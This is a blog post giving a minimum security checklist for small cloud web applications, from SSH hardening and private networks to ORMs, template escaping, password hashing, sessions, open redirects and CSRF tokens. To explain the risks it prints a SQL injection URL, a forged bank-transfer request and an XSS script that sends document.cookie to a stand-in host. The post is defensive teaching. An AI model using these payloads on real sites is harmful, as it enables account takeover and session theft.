Hartley Brody

Startup Security Guide: Minimum Viable Security Checklist for a Cloud-Based Web Application

The internet can be a scary place. I learned this the hard way when I built my first website back in 2008 and promptly had my guestbook spammed by waves of bots.

Since then, I’ve spent a decade building and securing web applications, and learned a lot along the way. While the specific techniques evolve over time, there are some core best practices that are always a good idea to follow whenever you’re putting a service up on the internet.

A checklist of guidelines for securing a new product

This article is written for lone developers or small teams who are interested in making sure they have their bases covered from a security perspective. The focus is mostly on dynamic web applications hosted on cloud services like Amazon Web Services (AWS) or Google Cloud Platform (GCP). It is not meant as an exhaustive guide, just a list of low hanging fruit that you can easily do early on to prevent most major, obvious software security issues.

I’ve organized the guide by starting with the network layer and moving up to the application, since that seems to be how most penetration tests and real world attacks progress.

1. Close All Unnecessary Ports on Your Web Servers

Every open port on a host is a potential foothold into your systems for a remote attacker. Nowadays it’s trivial for an attacker to scan thousands of ports across a wide range of IPs looking for known versions of insecure services (a technique called “banner grabbing”). Once they’ve find a few entry points, it’s easy to search for and run exploits against those services to gain access to the machine.

The operating system of your web server’s VM may come with all sorts of default service – to be helpful! These may include things like FTP servers, proxy servers and more – but if you’re not interesting in securing, patching and maintaining those service over time, make sure they’re turned off and hidden from the outside world.

You could use something on the server like iptables, or you could rely on your cloud server provider’s firewall product to disallow all traffic to your web servers that’s not on the default ports for HTTP (80) or SSL (443).

If you need to leave SSH open for manual server administration, move that to a non-standard port (something besides port 22) to avoid naive crawlers and script kiddies constantly banging on the door.

2. Properly Secure the SSH Connections to Your Web Servers

One day, when you’re a big company with a huge cloud infrastructure team, you’ll have all sorts of automation setup and you won’t ever need to manually administer servers over SSH. You’ll treat them like cattle, not pets.

But until then, you’re likely going to need SSH access to your machines for manual configuration changes as your infrastructure is still maturing. That’s okay, but here’s how to do it safely.

First things first, you should disable root login. The root user is the biggest target for attackers since it is simultaneously (1) the most common username across servers and it also (2) has the most privileged system access. This makes root a goldmine for anyone trying to gain access to your web servers.

Disabling root SSH access is as simple as adding the following line to the end of your /etc/ssh/sshd_config file on the server:

PermitRootLogin no

While you’re in that file, it’s also a great idea to disable password authentication for SSH connections altogether. You can do that by adding the following line (it may already be there and you simply need to un-comment it).

PasswordAuthentication no

Instead, you should be using public keys to control SSH access. If you’ve never used public keys for anything before, it does take a bit of work to setup initially, but it’s very secure and much easier to manage in the long run.

Make sure you add your machine’s own public key to the ~/.ssh/authorized_keys file for the SSH user you’ll be using. This also makes it easy to revoke someone’s access down the line. Simply remove their laptop’s public key from the ~/.ssh/authorized_keys file and they’ll be locked out, no need to rotate SSH passwords and force everyone else to change.

3. Hide Your Backing Services from the Internet

If you’re following my MVP scalable architecture (which you should be!), you’ll have your database server running on a separate host from your web server(s). You want to ensure that your application’s backing services – like the database, and any caching layers like redis or memcached – cannot be accessed by someone outside your trusted network.

At the very least, drop all traffic that isn’t coming from a whitelist of your web servers’ IP addresses. However, this can quickly become a pain to maintain manually if you’re adding or removing web servers a lot.

An even better approach is to put all of the backing services hosts in a private network that can’t be seen from outside of the network. You can usually set this up as a Virtual Private Cloud (VPC) with any cloud provider like Google Cloud or AWS.

In fact, this is the exact use-case that AWS spells out for a VPC on their marketing homepage:

For example, you can create a public-facing subnet for your web servers that has access to the Internet, and place your backend systems such as databases or application servers in a private-facing subnet with no Internet access.

Note that you should still be using passwords to access backing services on top of all of this, in case an attacker enters your network, as an extra layer of defense.

4. Never Serve Files Off the Web Server’s File System

There’s really no reason you should ever be serving files directly off of the file system from your web servers these days.

There are all sorts of ways to accidentally misconfigure things and allow anyone to traverse the source code or other contents of your web server’s file system. Save yourself the headache and avoid using things like nginx’s root directive or Apache’s DocumentRoot directive in your frontend web server. In fact, the nginx docs on “common mistakes” specifically lists a few bad uses of the root directive – take heed!

This is a performance recommendation as much as it as a security recommendation. Static resources like CSS, javascript and images that belong to your application should be hosted on a more-fitting static file host like AWS S3 or Google’s Cloud Storage.

5. Serve User Generated Content on a Different Domain

Continuing the last point, the other place where applications can get into trouble with serving static files is when they’re serving user-generated content like uploaded profile pictures or document attachments.

Make sure you serve any user-uploaded content from a completely different domain from your main application. Many big sites already do this:

  • facebook uses fbcdn.net
  • github uses githubusercontent.com
  • twitter uses pbs.twimg.com

If users can upload HTML documents and have them hosted on your application’s primary domain, that’s an excellent way to setup phisihing opportunities for attackers. Serving user content from your domain can also fool users into thinking malicious content is actually legitimate content from your company, as the FCC found out last fall.

Users could upload malicious javascript that would be run by the browser with the same trust level as your application’s javsacript code, allowing it to tamper with your site’s cookies and potentially steal user’s credentials, sessions or other data.

6. Avoid SQL Injections (SQLI) By Properly Using an ORM

For the transactional needs of the average relational database, there’s no reason not to be using an Object Relational Mapper (ORM) to interface with your database.

An ORM saves you from having to write a ton of boilerplate code for mundane tasks like generating SQL statements and turning database rows into objects you can work easily work with in code.

From a security standpoint, an ORM will also save you from SQL injection attacks (SQLI), where a malicious user might try to extract information from your database by creating malicious payloads.

Imagine a web application with a URL like: http://example.com/user/123. The code that runs on a request for that page will probably grab the user ID from the URL and use it to look up the user, running a SQL query that looks like

SELECT * FROM users WHERE id = 123

Now imagine a malicious user were to navigate to a specially crafted URL such as http://example.com/user/NULL+OR+1=1. Without proper escaping, the server would generate a SQL expression like this and send that off to the database.

SELECT * FROM users WHERE id = NULL OR 1=1

Because of the “OR 1=1”, that WHERE clause would match every single row in the user’s table, meaning the database would return a list of every user and the results may be rendered to the page. Not ideal!

An ORM would turn that into the following safe query, which would simply match no rows.

"SELECT * FROM users WHERE id = %s", ("NULL OR 1=1")

If you do have a special use-case that your ORM doesn’t support and you find yourself having to write raw SQL, always ensure that you’re using prepared statements or parameterized queries and never manually building SQL statements with string concatenation or variable substitution.

7. Avoid Cross-Site Scripting (XSS) by Using an HTML Template Library

You should be using a template library for rendering HTML documents and automatically escaping HTML characters. Like an ORM, a good template library not only save you the hassle of writing lots of boilerplate code, it also add some security benefits.

In any dynamically generated web application, user-generated content will be mixed in directly with the HTML you’ve written for your application to render the page.

Without proper XSS filters, a user could set their username to something like the following (what a mouthful!):

<script>i = new XMLHttpRequest(); i.open('GET', 'https://example.com/receive-cookies/' + document.cookie, true); i.send();</script>

Then, whenever a user navigated to that attacker’s profile, your backend would combine that “username” with the rest of the HTML on the page. The attacker’s payload would be run and trusted by the user’s browser as if it were javascript from your application and users would unknowingly have their session cookies sent to an attacker’s server. Not ideal!

A proper template library would turn the above code into

&lt;script&gt;i = new XMLHttpRequest(); i.open('GET', 'https://example.com/receive-cookies/' + document.cookie, true); i.send();&lt;/script&gt;

rendering it invalid as an HTML <script> tag and harmless (and weird looking) to users.

From time to time, you may find yourself needing to disable the default escaping in order to leave information properly formatted for the frontend, maybe if you’re “rendering” some JSON on the server in order to pass it to javascript on the frontend.

Admittedly, I wrote a security bug at one point for a client doing the same thing. While we were initially only passing “trusted” content that I assumed would be safe to render, over time the page evolved and we added some user-generated content to that JSON, that created a potential XSS vulnerability.

XSS bugs are the most common type of security vulnerabilities across all industries according to Hacker One’s latest report and they can sneak in over time if you’re not careful.

8. Hash and Salt Your Users’ Passwords

If this is the first time you’re hearing someone someone say this, you should hang out on web development forums more often because this is one of the most common – and costly – mistake made by new or junior web developers.

There’s no reason to ever store your user’s passwords in plaintext in your database. The current state of the art is to add a random, unique salt to each password and then hash it with bcrypt thousands of times. But really, you should use a library for this that comes with sane defaults.

Never try to build your own crypto systems, and that goes for password security as well.

9. Require Your Users to Create Strong Passwords

This one may not seem like it should be part of an application or network security checklist – if the user makes a bad password and gets hacked, that’s their fault! Right?

If users are getting their accounts compromised, it’s going to reflect poorly on your application, regardless of whose fault it is.

Forget about funky password requirements like mixing cases, requiring numbers, or anything complex like that. Those are old standards that are now outdated.

Instead, set a minimum length of something like 8-12 characters (no max length limit – we are storing fixed-length hashes (#8) in our DB, after all!) and then check any new passwords against a database of the most common passwords found in breaches.

That should take all of one hour to implement and will help minimize the success of any brute-force password guessing attacks against your product.

10. Serve Your Site Over SSL

Serving your site over SSL protects your site’s users from having their connections tampered with – either by an attacker on their network (say, a public wifi hotspot) or some intermediary along the line, like a rogue Internet Service Provider (ISP).

If you’re not familiar with how SSL works, you can learn what you need to know here. Serving your site over SSL also has SEO benefits as Google has said it uses SSL (as well as page load time) as a ranking signal when deciding what sites to return in the results for a query.

You can get a free SSL certificate from Let’s Encrypt and it takes only a few minutes to setup with their certbot, so the benefits far outweigh the minimal costs of setting one up.

This is much easier if you simply start by serving your site over SSL from day #1 versus trying to move to it down the line, since you’ll catch any mixed content warnings as you’re adding new content to the site over time, instead of having to go back and catch them all at once if you move to SSL later on.

11. Don’t Use Cookies for Session Storage

Server-side sessions are a common feature of many web application frameworks. The idea is you can tuck some information “into the session” and it will be available again later for subsequent requests from that same user.

By default, some session implementations simply store the session values that your application sets in a cookie on the user’s browser, maybe base64 encoding it for “obfuscation” purposes.

But if you’re putting anything remotely sensitive in your session (say, the currently logged in user’s ID), then you don’t want to be trusting a user-editable cookie for something like that. A user could edit the cookie to change the ID and suddenly your application will give them access to another user’s account. Not ideal!

Instead, make sure you’ve configured a proper server-side session storage backend – something like a database or a cache service – and keep the session data in there.

You’ll still likely need to use cookies, but there’s an important distinction between using cookies to identify a user’s session versus using them to store information about the session.

In an ideal setup, you’ll simply set a cookie in the user’s browser called “session_id” and it will contain some long, unique value (like a UUID) that will be that user’s unique session identifier. When a request comes in, your session management system should look up that user’s session information in a backend system (like a database or cache) using the session ID in the cookie.

You should make sure to inspect the cookies that your site is generating – login using an incognito browser to see what ends up getting set as you browse the site and perform various tasks. You shouldn’t see anything valuable sent to or from the browser.

12. Don’t Allow Open Redirects

Any page of your application that can respond with a redirect (say, a login page or error page) should never blindly redirect a user to a fully qualified URL. Instead, try to return a path-only Location header that keeps the user on the same domain.

The vulnerability here is that a malicious user could create a targeted phishing campaign against your site. They could setup a copy of your site on a different domain and then send someone a link to the open redirector page on your site with a query argument that redirects to the attacker’s site.

Since users usually scan the domain but not the query arguments when deciding to trust a link, they’ll think the link is legitimate even though you redirected them to an attacker’s website.

This attack is particularly sneaky if it comes after a login page. Imagine someone sent one of your users a link to the following URL:


The user would be taken to your actual login page, where they would successfully login, and then be redirected to the next query argument – which, in this case, takes them off your site to a page an attacker is controlling.

If the attacker sets it up to look like your site, the user may be none the wiser if they don’t check the URL bar after logging in, and may be tricked into giving up information (“Please enter your password one more time…”).

13. Use CSRF Tokens on Important Form Submissions

As the name implies, a “Cross-Site Request Forgery” is when an attacker on one site is able to trick a user into submitting a forged request on your site without the user realizing.

The canonical example is a bank transfer. If you’re a bank and you allow users to transfer funds with a request like

GET http://www.example.com/transfer_funds?amt=500&to_acct=12345

then a malicious attacker could simply embed a link like that somewhere innocuous (“Click here to win a free iPad!”, on facebook). If a logged-in user of your site sees the link on another site and clicks on it, then they will have transferred the funds before they even realize what has happened.

The way you prevent this from happening on your site is by including so-called “CSRF tokens” in your forms. The basic implementation is that you generate a random CSRF token when you load the page that asks the user to submit or confirm some sort of transaction. You would hide this value in the HTML of the form using something like:

<input type="hidden" name="csrf_token" value="..." />

Then, when the user submits the form to confirm the transaction, you would check for both the presence of the CSRF token, and whether or not it matches the previously set value before allowing the request to process. In this way, an attacker embedding the example “bank transfer” link would hit a dead end, since your application would reject the request since it doesn’t have a correct CSRF token value.

If you follow these steps, you will have a very secure base for launching and growing your product. All of your application’s data will be hidden from the public internet and your web servers will be locked down to only handle very specific types of traffic.

Your application will be secure against the most common vulnerabilities as well as some newer, more targeted phishing campaigns. Your will be taking solid precautions to safeguard your users’ data and creating a secure experience for them in your app.

As your application begins to process a greater number of users and their data, there will be additional security steps you’ll want to think about down the line, but these steps that I’ve listed are the most basic ones that are easy to setup and should last you for a long time.

If you’re interested in learning more about securing web applications, I’d be remiss if I didn’t tell you about the Open Web Application Security Project (WASP) “Top 10” guidelines that came out last year, although I’ve found it’s a bit too obtuse to be of much practical use to a lone developer or a small software team.

If you’d like to talk more about this stuff, drop me a line! 🎣

Discussion on reddit.